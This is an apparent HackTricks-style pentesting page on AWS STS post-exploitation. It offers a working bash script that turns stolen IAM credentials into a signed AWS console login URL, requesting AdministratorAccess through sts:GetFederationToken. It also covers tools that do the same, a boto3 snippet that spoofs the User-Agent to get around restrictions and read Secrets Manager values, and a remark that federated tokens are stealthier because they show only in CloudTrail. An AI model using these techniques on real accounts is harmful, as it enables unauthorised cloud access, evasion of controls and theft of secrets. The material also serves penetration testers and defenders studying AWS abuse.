# AWS - STS Post Exploitation

{{#include ../../../../banners/hacktricks-training.md}}

## STS

For more information:

{{#ref}}
../../aws-services/aws-iam-enum.md
{{#endref}}

### From IAM Creds to Console

If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\
Note that the the user/role must have the permission **`sts:GetFederationToken`**.

#### Custom script

The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:

```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
    exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
    --get \
    --data-urlencode "Action=getSigninToken" \
    --data-urlencode "SessionDuration=43200" \
    --data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)


# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```

#### aws_consoler

You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).

```bash
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console
```

> [!WARNING]
> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.

#### aws-vault

[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.

```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```

> [!NOTE]
> You can also use **aws-vault** to obtain an **browser console session**

### **Bypass User-Agent restrictions from Python**

If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:

```bash
# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
```

### **`sts:GetFederationToken`**

With this permission it's possible to create a federated identity for the user executing it, limited to the permissions that this user has.

```bash
aws sts get-federation-token --name <username>
```

The token returned by sts:GetFederationToken belongs to the federated identity of the calling user, but with restricted permissions. Even if the user has administrator rights, certain actions such as listing IAM users or attaching policies cannot be performed through the federated token.

Additionally, this method is somewhat more stealthy, since the federated user does not appear in the AWS Portal, it can only be observed through CloudTrail logs or monitoring tools.

{{#include ../../../../banners/hacktricks-training.md}}